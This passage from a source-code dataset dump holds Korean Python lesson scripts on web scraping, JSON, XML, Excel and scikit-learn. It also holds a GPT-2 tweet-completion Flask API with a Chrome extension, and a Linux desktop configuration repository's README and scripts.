"text": "from bs4 import BeautifulSoup\n\nhtml = '''\n<html><body>\n<div id=\"meigen\">\n\t<h1>위키북스 도서</h1>\n\t<ul class=\"items art it boo\">\n\t\t<li>유니티 게임 이펙트 입문</li>\n\t\t<li>스위프트로 시작한는 아이폰 앱 개발 교과서</li>\n\t\t<li>모던 웹사이트 디자인의 정석</li>\n\t</ul>\n</div>\n</body></html>\n'''\n# 태그 선택자 : \"ul\", 'div', 'li'\n# 아이디 선택자 : #id => 하나 지정\n# 클래스 선택자 : .class => 여러개 지정 가능\n# 구조 선택자 : 후손 선택자, 자식 선택자\n# 후손 선택자 : 태그 아래의 모든 것 <html>아래의 body, h1, ul, li \"#meigen li\"\n# 자식 선택자 : 태그 바로 아래의 자식 <html>아래의 <body> 만 자식 \"ul.items > li\"\n\nsoup = BeautifulSoup(html,'html.parser')\nheader = soup.select_one('body> div > h1') # 하나 선택, 요소\nlist_items = soup.select('ul.items > li') # 여러개 선택, 요소의 배열\n\nprint(header.string)\n#header.attrs['title']\nprint(soup.select_one('ul').attrs)\n\nfor li in list_items:\n\tprint(li.string)"
},
{
"alpha_fraction": 0.5426997542381287,
"alphanum_fraction": 0.5977961421012878,
"avg_line_length": 17.200000762939453,
"blob_id": "52d2424af1aae8c88f057d0dffddefaa8ecc9fa2",
"content_id": "d72f8f118d975a9c1829bbbedf08a36c617844ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 20,
"path": "/lesson122.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import json\n\njson_str = \"\"\"[\n\t{\"name\":\"사과\",\"price\":1000},\n\t{\"name\":\"바나나\",\"price\":2000},\n\t{\"name\":\"배\",\"price\":3000},\n\t{\"name\":\"귤\",\"price\":4000},\n\t{\"name\":\"자두\",\"price\":5000}\n]\"\"\"\n\nprint('# 문자열 => 파이썬 자료형')\noutput = json.loads(json_str)\nprint(output)\nprint(type(output))\nprint()\n\nprint('# 파이썬 자료형 => JSON 문자열')\ntext = json.dumps(output)\nprint(text)\nprint(type(text))"
},
{
"alpha_fraction": 0.6540880799293518,
"alphanum_fraction": 0.6808176040649414,
"avg_line_length": 24.479999542236328,
"blob_id": "dc894afbe26eff9e1d1ce1cfdbd7a596e382b22e",
"content_id": "3ba1442b36553a8876e3173925aff6ebb0227eef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 25,
"path": "/lesson101.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n- 다운 로드 : docker pull continuumio/miniconda3\n- 실행 : docker run -it continuumio/miniconda3 /bin/bash\n- 파이썬 실행해보기 : python -c 'print(3*5)'\n- 빠져나오기 : exit\n\n- 새로운 이미지 생성 ( 컨테이너 상태 저장하기 )\n > docker run -it continuumio/miniconda3 /bin/bash\n > pip install beautifulsoup4\n > pip install requests\n > exit\n > docker ps -a\n > docker commit <컨테이너 ID> <이름>:<태그>\n > docker commit c63b5b00d942 melearn:init\n > docker run -it melearn:init\n\n- 홈폴더를 마운틴해서 사용하기\n > docker run -it -v <폴더이름>:<컨테이너의폴더> <이미지이름>:<태그이름>\n > docker run -it -v /volumn2/docker/aircomix:/park parka\n\n- synology 설정\n > LANG C.UTF-8 LC_ALL C.UTF-8\n > /docker/aircomix\n\n''')"
},
{
"alpha_fraction": 0.6977611780166626,
"alphanum_fraction": 0.7108209133148193,
"avg_line_length": 25.850000381469727,
"blob_id": "54ea888c163b30eb5f6e014748cc129c55457d91",
"content_id": "db1d8d7baacb1f5a0ab6bd5d765f2f7eb7edf568",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 558,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/lesson120.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport urllib.request\n\nurl = 'http://www.weather.go.kr/weather/forecast/mid-term-rss3.jsp?stnId=108'\nrequest = urllib.request.urlopen(url)\nxml = request.read()\n\nsoup = BeautifulSoup(xml,'html.parser')\n\nfor location in soup.findAll('location'):\n\tprint(location.city.string)\n\tprint('-'*20)\n\n\tfor data in location.findAll('data'):\n\t\tprint('시간 :',data.tmef.string)\n\t\tprint('날씨 :',data.wf.string)\n\t\tprint('최저 :',data.tmn.string)\n\t\tprint('최고 :',data.tmx.string)\n\t\tprint('신뢰도 :',data.reliability.string)\n\t\tprint()"
},
{
"alpha_fraction": 0.642201840877533,
"alphanum_fraction": 0.6811926364898682,
"avg_line_length": 19.809524536132812,
"blob_id": "24a31ee269fdc2155a47bd9ae87a703113c7481f",
"content_id": "44d620ae45ae92ca90e3f555c2f296814e552bbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 21,
"path": "/lesson127.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ xls 사용 ]\n- 자료 다운로드 : http://www.index.go.kr/potal/main/EachDtlPageDetail.do?idx_cd=1041\n- 받은 자료 최근 통합자료로 새이름 저장\n- pip install openpyxl\n''')\n\nimport openpyxl\n\nbook = openpyxl.load_workbook('stats_104102.xlsx')\n\n# 첫 번째 방법 \nprint(book.get_sheet_names())\nprint(book.get_sheet_by_name('stats_104102'))\n\n# 두 번째 방법\nsheet = book.worksheets[0]\nfor row in sheet.rows:\n\tfor data in row:\n\t\tprint(data.value, end=\" \")\n\tprint(\"\",end=\"\\n\")"
},
{
"alpha_fraction": 0.654618501663208,
"alphanum_fraction": 0.6987951993942261,
"avg_line_length": 19.83333396911621,
"blob_id": "e85d159c85867ec5491538f54038f79eaf076ef1",
"content_id": "82f825c394f12922e36e08846e5ea96db795dff4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 279,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 12,
"path": "/lesson128.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import openpyxl\n\nworkbook = openpyxl.Workbook() \nsheet = workbook.active\n\n# 데이터 쓰기\nsheet['A1'] = '테스트 파일'\nsheet['B2'] = '안녕하세요'\nsheet.merge_cells('A1:C1')\nsheet['A1'].font = openpyxl.styles.Font(size=20,color='FF0000')\n\nworkbook.save('newFile.xlsx')"
},
{
"alpha_fraction": 0.4465116262435913,
"alphanum_fraction": 0.45116278529167175,
"avg_line_length": 16.95833396911621,
"blob_id": "0a24e51a600a8da057c23d4becbcd965e9220d2a",
"content_id": "72a479eec498f152721e4705c4829da6328ac816",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 24,
"path": "/lesson118.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ XML ]\n- 여는 태그와 닫는 태그\n > <태그></태그> # 요소(element)\n > <태그 />\n- 콘텐츠\n > <태그>{{콘텐츠}}</태그>\n > <태그>\n \t\t\t<태그>{{콘텐츠}}</태그>\n\t\t\t<태그>{{콘텐츠}}</태그>\n </태그>\n- 속성\n > <태그 속성='값' 속성='값' 속성='값'>{{콘텐츠}}</태그>\n > <태그 속성='값' 속성='값' 속성='값' />\n > \"\" => 문자열\n- 루트 태그는 하나 : 가장 위에 있는 태그\n\t<rss version=\"2.0\"> # 루트 태그\n\t\t<hannel>\n\t\t\t<title>\t</title>\n\t\t\t<description> </description>\n\t\t</hannel>\n\t</rss>\n- <![CDATA[문장]]> : 문장의 내용이 길 때 문장 보호를 위해 사용\n''')"
},
{
"alpha_fraction": 0.6608695387840271,
"alphanum_fraction": 0.6840579509735107,
"avg_line_length": 22.066667556762695,
"blob_id": "cd593e3a52e74c393beae18ec6b1c93c58f5f19b",
"content_id": "79ded9beea3965dd1ef678f5bb68b6476802658b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 351,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 15,
"path": "/lesson132.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from sklearn import svm, metrics\nimport pandas\n\ncsv = pandas.read_csv('iris_a.csv')\ndata = csv[['SepalLength','SepalWidth','PetalLength','PetalWidth']]\nlabel = csv['Name']\nsample = [[5.1, 3.0, 1.3, 0.2]]\n\nclf = svm.SVC()\nclf.fit(data,label)\nresults = clf.predict(sample)\nprint(results)\n\n# score = metirics.accuracy_score()\n# print('정답률 :',score)"
},
{
"alpha_fraction": 0.36882129311561584,
"alphanum_fraction": 0.46768060326576233,
"avg_line_length": 13.666666984558105,
"blob_id": "ca94a0c605c3e66a5bdd0b636e3f86505c968778",
"content_id": "560980bf705b185a9897e947e463c7a8fbeb3b28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 18,
"path": "/lesson121.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ JSON ]\n- JavaScript Object Notation\n- 자료형\n > 숫자 : 10, 52.273\n > 문자열 : \"제품\", \"1020203\"\n > 불 : true, false\n > null : null\n > 배열 : [10, 273, \"안녕하세요\", true]\n > 객체 : \n\t {\n\t\t\"키A\":273,\n\t\t\"키B\":\"값\",\n\t\t\"키C\":true,\n\t\t\"키D\":[12,52],\n\t\t\"키E\":{\"name\":\"park\"},\n\t }\n''')"
},
{
"alpha_fraction": 0.6746987700462341,
"alphanum_fraction": 0.6847389340400696,
"avg_line_length": 25.263158798217773,
"blob_id": "0b42d9c88c905d419b2c2b1d50da7634bf25aa8d",
"content_id": "44aff58d01bd23905b582a3d6324c45c5fe9b2e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 576,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 19,
"path": "/lesson108.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport urllib.request\n\nprint('네이버 시장지표 페이지 가져오기')\nurl = 'https://finance.naver.com/marketindex/'\nhtml = urllib.request.urlopen(url)\n\nsoup = BeautifulSoup(html,'html.parser')\n# soup.select_one()\nresults = soup.select('span.value')\nprint('[ 환전 고시 환율 ]')\nprint('달러 환율 =',results[0].string,'원') \nprint('엔 환율 =',results[1].string,'원') \nprint('유로 환율 =',results[2].string,'원') \nprint('중국 환율 =',results[3].string,'원') \nprint()\n\nfor result in results:\n\tprint(result.string)"
},
{
"alpha_fraction": 0.7342657446861267,
"alphanum_fraction": 0.7412587404251099,
"avg_line_length": 14.94444465637207,
"blob_id": "8b8dfd20f3b51e68daa4a0842247daa8d25363f6",
"content_id": "1a0e0b7918cfffaceb7e9e47def4122448ca582f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 18,
"path": "/lesson115.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\n\nurl = 'https://nid.naver.com/nidlogin.login'\n\n# PhantomJS 드라이버 추출하기\nbrowser = webdriver.PhantomJS()\n\n# 3초 대기하기\nbrowser.implicitly_wait(3)\n\n# url 읽어 들이기\nbrowser.get(url)\n\n# 화면을 캡처해서 저장하기\nbrowser.save_screenshot('website_b.png')\n\n# 브라우저 종료하기\nbrowser.quit()"
},
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7111111283302307,
"avg_line_length": 19.846153259277344,
"blob_id": "3aa9c50be360a0bdf46f8776820fdc2c4ecbe0be",
"content_id": "1da7ae30157f75bb3476f384964caa91d37fc536",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 13,
"path": "/lesson123.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import urllib.request as request\nimport json\n\njson_str = request.urlopen(\"https://api.github.com/repositories\").read()\noutput = json.loads(json_str)\n\nfor item in output:\n\tprint(item[\"name\"])\n\tprint(item[\"full_name\"])\n\tprint(item[\"owner\"][\"login\"])\n\tprint()\n\njson.dumps()"
},
{
"alpha_fraction": 0.6462264060974121,
"alphanum_fraction": 0.6462264060974121,
"avg_line_length": 26.69565200805664,
"blob_id": "cf6fe308f99c95ed840efb15aca13b67a296db33",
"content_id": "7db859364f94b5b93addd78a10337ba20a992d42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1162,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 23,
"path": "/lesson129.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ 웹 API(Application Programming Interface) ]\n- 어떤 사이트가 가지고 있는 기능을 외부에서도 쉽게 사용할 수 있게 공개한 것을 의미한다.\n- XML, CSV,JSON과 같은 데이터 공유를 의미\n- 일반적인 프로그램 계발 : 기획자,디자이너,계발자\n- 머신 러닝 : \n\t> 어떤 가설을 기반\n\t> 어떤 데이터를 넣었을 때\n\t> 원하는 데이터를 뽑아 내는 과정\n\t> 기획자 : 데이터가 있고 데이터를 기반으로 가설을 설정 하는 것\n\t> 계발자 : 가설을 기반으로 증명하는 사람\n\t> 디자이너 : 증명된 가설을 바탕으로 데이터 시각화하여 사람들에게 알리는 것\n- 기획에서 중요점 : 어떤 데이터를 사용하는 것 \n\t> 우리에게 필요한 데이터\n\t> 그 데이터를 어떻게 가져 올 수 있고\n\t> 그 데이터를 어떻게 조합하여 가설을 세울 수 있는가?\n- 국내 API\n\t> APISTORE : https://www.apistore.co.kr/api/apiList.do\n\t> 공공데이터포털 : https://www.data.go.kr/main.do\n- 주의 할 점\n\t> naver.com/robots.txt\n\t\t- User-agent:* Disallow: / 어떠한 사용자도 허가 하지 않음\n''')"
},
{
"alpha_fraction": 0.6409638524055481,
"alphanum_fraction": 0.6554216742515564,
"avg_line_length": 20.894737243652344,
"blob_id": "f785b5ba211ea954c748b6f60dd3eb9dffdd3b38",
"content_id": "99fa2c169d49472e437c68b0376a6f1d68bfc6fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 19,
"path": "/lesson106.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import urllib.request\nimport urllib.parse\n\napi = 'https://search.naver.com/search.naver'\nvalues={\n\t'sm':'tab_sug.top',\n\t'where':'kin',\n\t'query':'초콜릿' # %EC%B4%88%EC%BD%9C%EB%A6%BF\n}\n\nparams = urllib.parse.urlencode(values) # 요청 매개 변수\nurl = api + '?' + params\nprint('ape =',api)\nprint('params =',params)\nprint('url =', url)\n\ndata = urllib.request.urlopen(url).read()\ntext = data.decode('utf-8') # euc-kr\nprint(text)"
}
] | 29 |
aliva/docker-py | https://github.com/aliva/docker-py | 40ec0e3c849bde73244631ece68be0d5d594cc0c | ea728c1bd5e495fe7afc0a3550e90c8acd6a51ff | d94f7179270d80d0c049591f3bc0841d6aeb3e1b | refs/heads/master | 2019-07-05T08:13:32.974548 | 2014-06-22T16:40:28 | 2014-06-22T16:40:28 | 21,091,396 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5220500826835632,
"alphanum_fraction": 0.5411204099655151,
"avg_line_length": 33.95833206176758,
"blob_id": "81cf730cdd96b98ff6da00b55bce069ed3848f54",
"content_id": "809336bcf5ee2d857db86486f03580a11b1f6bc7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 839,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 24,
"path": "/tests/utils_test.py",
"repo_name": "aliva/docker-py",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom docker.utils import parse_repository_tag\n\n\nclass UtilsTest(unittest.TestCase):\n\n def test_parse_repository_tag(self):\n self.assertEqual(parse_repository_tag(\"root\"),\n (\"root\", None))\n self.assertEqual(parse_repository_tag(\"root:tag\"),\n (\"root\", \"tag\"))\n self.assertEqual(parse_repository_tag(\"user/repo\"),\n (\"user/repo\", None))\n self.assertEqual(parse_repository_tag(\"user/repo:tag\"),\n (\"user/repo\", \"tag\"))\n self.assertEqual(parse_repository_tag(\"url:5000/repo\"),\n (\"url:5000/repo\", None))\n self.assertEqual(parse_repository_tag(\"url:5000/repo:tag\"),\n (\"url:5000/repo\", \"tag\"))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6903553009033203,
"alphanum_fraction": 0.7225042581558228,
"avg_line_length": 18.700000762939453,
"blob_id": "30ac2b15c8c4ce89e48f89a39ec91db02ce3ec7a",
"content_id": "8d46e8aa7874f7280fffcc39814b56d83ab9df0b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 591,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 30,
"path": "/tox.ini",
"repo_name": "aliva/docker-py",
"src_encoding": "UTF-8",
"text": "[tox]\nenvlist = py26, py27, py32, py33, py34, flake8\nskipsdist=True\n\n[testenv:py26]\nusedevelop=True\ncommands =\n {envpython} tests/test.py\ndeps =\n -r{toxinidir}/requirements.txt\n -r{toxinidir}/test-requirements.txt\n\n[testenv:py27]\nusedevelop=True\ncommands =\n {envpython} tests/test.py\ndeps =\n -r{toxinidir}/requirements.txt\n -r{toxinidir}/test-requirements.txt\n[testenv]\nusedevelop=True\ncommands =\n {envpython} tests/test.py\ndeps =\n -r{toxinidir}/requirements3.txt\n -r{toxinidir}/test-requirements.txt\n\n[testenv:flake8]\ncommands = flake8 docker tests\ndeps = flake8\n"
}
] | 2 |
yizenglistat/cs224n-natural-language-processing-with-deep-learning | https://github.com/yizenglistat/cs224n-natural-language-processing-with-deep-learning | e1fbd12558230b7deaef92630e14ef68f246af31 | a3db0f5e49b7e894e90144625179ec3326cc5c44 | 962758c093a256790dc64a26cf0ac3d1ae533a22 | refs/heads/master | 2020-12-19T10:23:42.458967 | 2020-01-23T02:08:45 | 2020-01-23T02:08:45 | 235,706,504 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.8494623899459839,
"avg_line_length": 46,
"blob_id": "e6ea6d3473fadc74f1acd175c467e13f7e47e84b",
"content_id": "90fdd4398e8077ea8a1260efc2ec9b426dbd8fc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 2,
"path": "/readme.md",
"repo_name": "yizenglistat/cs224n-natural-language-processing-with-deep-learning",
"src_encoding": "UTF-8",
"text": "# Winter 2020 CS224n: Natural Language Processing with Deep Learning\nCoursework from Stanford"
},
{
"alpha_fraction": 0.8035714030265808,
"alphanum_fraction": 0.8035714030265808,
"avg_line_length": 18,
"blob_id": "283c88d58ec0279a72b3e93c243d533d2dc3f37f",
"content_id": "e2ca7415fe987e14494033dc20581f1b1c3f04df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 3,
"path": "/test.py",
"repo_name": "yizenglistat/cs224n-natural-language-processing-with-deep-learning",
"src_encoding": "UTF-8",
"text": "#python script\nimport numpy as np \nimport seaborn as sns"
}
] | 2 |
d1shs0ap/tweeter | https://github.com/d1shs0ap/tweeter | f5d2e92b8ba6f3c2e9dfee46abac4bebfabcaeb7 | 9fd60a19b28061596339577b78dd831edcc67511 | 1533a1ae46364886d4c2665e4bb1c392865be373 | refs/heads/master | 2023-02-05T01:00:19.697135 | 2020-12-20T14:27:30 | 2020-12-20T14:27:30 | 288,544,418 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6101398468017578,
"alphanum_fraction": 0.617132842540741,
"avg_line_length": 23.869565963745117,
"blob_id": "bbd27b04630813211eb3b539e2977b26b1a2f5ce",
"content_id": "da2f367fa61cd0a1b74d30d58ff9ab82c78b6b16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 23,
"path": "/api/main.py",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, jsonify, render_template\nfrom flask_cors import CORS, cross_origin\nimport predictor\n\napp = Flask(__name__)\nCORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\[email protected]('/', methods=['POST', 'GET'])\n@cross_origin()\ndef home():\n if request.method == 'POST':\n req = request.json\n print(req)\n content = req['text']\n res = predictor.predict(content)\n return jsonify({'generatedText': res})\n else:\n return jsonify({'generatedText': 'hi'})\n\n\nif __name__ == \"__main__\":\n app.run(port=7000)\n"
},
{
"alpha_fraction": 0.6261090040206909,
"alphanum_fraction": 0.6425855755805969,
"avg_line_length": 29.384614944458008,
"blob_id": "55f54d37c30edc16c935cf0af615fa79e790c2b9",
"content_id": "56b4e6d6b68fa7c84723aac517dcb7eac87bc954",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 26,
"path": "/chrome/background.js",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "// here background needs to send gpt2 generated response back to content.js\n\n// receive message from content\nchrome.runtime.onMessage.addListener(function (request, sender, sendResponse) {\n\n // compute gpt2 reesponse using endpoint\n fetch('http://127.0.0.1:7000/', {\n method: 'POST',\n headers: {\n 'Content-type': 'application/json'\n },\n body: JSON.stringify({text: request.text}),\n })\n .then(response => response.json())\n .then(data => {\n console.log('Success:', data);\n\n // send response back to content script\n chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {\n chrome.tabs.sendMessage(tabs[0].id, { generatedText: data.generatedText });\n });\n })\n .catch((error) => {\n console.error('Error:', error);\n });\n})"
},
{
"alpha_fraction": 0.5891203880310059,
"alphanum_fraction": 0.6064814925193787,
"avg_line_length": 26,
"blob_id": "d9c33f7453287d4bcc499a8fd3ab8d3300057c55",
"content_id": "889b9005a59b24ae94eb5827e5679a92775774c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 864,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 32,
"path": "/api/predictor.py",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "from transformers import GPT2LMHeadModel, GPT2Tokenizer\nimport torch\n\n\ntokenizer = GPT2Tokenizer.from_pretrained('gpt2-xl')\nmodel = GPT2LMHeadModel.from_pretrained('gpt2-xl')\n\n\ndef predict(text):\n generated = tokenizer.encode(text)\n context = torch.tensor([generated])\n past = None\n output_cap = 20\n sentences_left = 1\n\n while output_cap > 0:\n print(output_cap)\n output, past = model(context, past=past)\n token = torch.argmax(output[..., -1, :])\n generated += [token.tolist()]\n context = token.unsqueeze(0)\n\n cur_token = tokenizer.decode([token.tolist()])\n if cur_token == '.' or cur_token == '!' or cur_token == '?':\n sentences_left -= 1\n if sentences_left <= 0:\n break\n\n output_cap -= 1\n\n sequence = tokenizer.decode(generated)\n return sequence\n"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8363636136054993,
"avg_line_length": 54,
"blob_id": "773e3a01df229498d207d9e5a614b07f30f8af99",
"content_id": "1d4777fdd95f9cbbaeb48d48de5274103ef92931",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 1,
"path": "/README.md",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "Tweet completer that would complete tweets using GPT2.\n"
},
{
"alpha_fraction": 0.6663163304328918,
"alphanum_fraction": 0.6731476783752441,
"avg_line_length": 31.810344696044922,
"blob_id": "d11bfbd6d14acde257ac1732eb51d68745b07a61",
"content_id": "08b05be4831a91d9942e18b33c78448f34733f44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1905,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 58,
"path": "/chrome/inject.js",
"repo_name": "d1shs0ap/tweeter",
"src_encoding": "UTF-8",
"text": "var textbar = (document.getElementsByClassName('DraftEditor-editorContainer')[0]).firstChild.firstChild.lastChild.firstChild.firstChild;\nlet textbarRect = textbar.getBoundingClientRect();\n\nvar span=document.createElement(\"span\");\ndocument.body.appendChild(span);\nspan.textContent='';\nspan.style.left=`${textbarRect.right}px`;\nspan.style.top=`${textbarRect.bottom}px`;\nspan.style.fontSize='19px';\nspan.style.fontFamily=\"Helvetica, sans-serif\";\nspan.style.position='absolute';\nspan.style.backgroundColor='#E6E6FA';\n\nlet timer = setTimeout(()=>{}, 0);\n\nlet withoutSpaceSpan;\n\n\n// updates whenever textbox changes\ntextbar.addEventListener('DOMSubtreeModified', () => {\n textbarRect = textbar.getBoundingClientRect();\n span.style.left=`${textbarRect.right}px`;\n span.style.top=`${textbarRect.bottom}px`;\n span.textContent='⏳';\n clearTimeout(timer);\n timer = setTimeout(() => {\n // sends typed text to content script\n if(textbar.textContent){\n window.dispatchEvent(new CustomEvent('getTypedText', {detail: textbar.textContent}));\n }\n }, 1000);\n});\n\n// receive generated text (by gpt2) from content script\nwindow.addEventListener('getGeneratedText', (event) => {\n // displays it\n const curLen = textbar.textContent.length;\n\n if (textbar.textContent == event.detail.substr(0, curLen)){\n if(event.detail[curLen]==' ') {\n span.textContent = '\\xa0' + event.detail.substr(curLen);\n } else {\n span.textContent = event.detail.substr(curLen);\n }\n withoutSpaceSpan = event.detail.substr(curLen);\n }\n \n}, false);\n\nwindow.addEventListener(\"keydown\", event => {\n if(event.key=='Tab'){\n event.preventDefault();\n if(span.textContent){\n textbar.textContent += withoutSpaceSpan;\n textbar.selectionStart = textbar.selectionEnd = textbar.value.length;\n }\n }\n})\n"
}
] | 5 |
davebs/daves-linux-configs | https://github.com/davebs/daves-linux-configs | 0605b4fb1b4373a395e74bfb80cbe4e49e87202c | ec321f18dd5f1648064f13290e7a56c1939f7141 | 5ab917ec76f6043b31647d2f9f037e366f114bcc | refs/heads/master | 2022-04-30T22:37:00.583620 | 2022-04-11T06:13:23 | 2022-04-11T06:13:23 | 96,241,541 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7482210993766785,
"alphanum_fraction": 0.7553366422653198,
"avg_line_length": 57.935482025146484,
"blob_id": "26d2c2bc922875cf350507ff1144f07c3ff91018",
"content_id": "ee43edc8877b5ee15d2312ecb013468906e47e67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1827,
"license_type": "no_license",
"max_line_length": 259,
"num_lines": 31,
"path": "/README.md",
"repo_name": "davebs/daves-linux-configs",
"src_encoding": "UTF-8",
"text": "## Dave Sullivan's Linux Config Files\n\nI end up needing these every time I install a fresh linux system. These are config files I use for vim, tmux, i3gaps, and compton. \n\nThey are decent config files, I think, honed after years of use. They are tailored to the way I work, so your mileage may vary.\n\n### Requirements\n\n#### tmux\nThe tmux config provided should pretty much just work. Put it in your home directory and call it ```.tmux.conf``` (notice the pre-pended dot)\n\n#### vim\nYou need to install vundle for the plugins to work. Otherwise just rename it to ```.vimrc``` and put it in your home directory.\n\n#### i3gaps\nYou'll need to install i3gaps. I3gaps is a fork of i3 that does everything i3 does but adds GAPS (such as those seen in AwesomeWM) around the window panels. This lets you see more of the desktop background and gives it a unique minimalist-but-functional look.\n\nThe i3 folder in this repo should be moved to your home directory and renamed ```.i3```\n\nAlso install ```feh``` and ```pasystray``` because they are used to change the background (which you should change to one of your choice) and adjust audio from the system tray (respectively).\n\n#### compton\nCompton is like compiz but not. I use it for window transparency effects. \nWhen you switch selected panels in i3, it adjusts the transparency of the inactive windows and dims them a bit. \n\nIt's a pretty cool and practical effect, particularly if you're making the bold decision to go \"borderless\" in i3. Totally bad ass. Worth setting up. \n\n*Note: The i3config restarts compton for you and reloads its config file every time you reload i3 (as opposed to only starting it at login).*\n\n#### rofi\nYou'll want to install rofi because that's what I use instead of dmenu in my i3 config. Rofi is a search-as-you-type program launcher kind of like OSX spotlight.\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6458333134651184,
"avg_line_length": 20.33333396911621,
"blob_id": "f5a05178e66d52cc31b76bcba21e40c6ba4d6457",
"content_id": "611e3825d47559c51db7921b8211fdb5b093bf7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/i3gaps/custom_status.sh",
"repo_name": "davebs/daves-linux-configs",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n# shell script to prepend i3status with more stuff\n\ni3status -t | while :\ndo\n read line\n output=$(python /home/ds/.i3/status.py)\n /bin/echo \"$output | $line\" || exit 1\ndone\n"
},
{
"alpha_fraction": 0.6281920075416565,
"alphanum_fraction": 0.6588355302810669,
"avg_line_length": 35.25925827026367,
"blob_id": "05beb9434722020d9c7beb70f5713aeb3b1a5f7f",
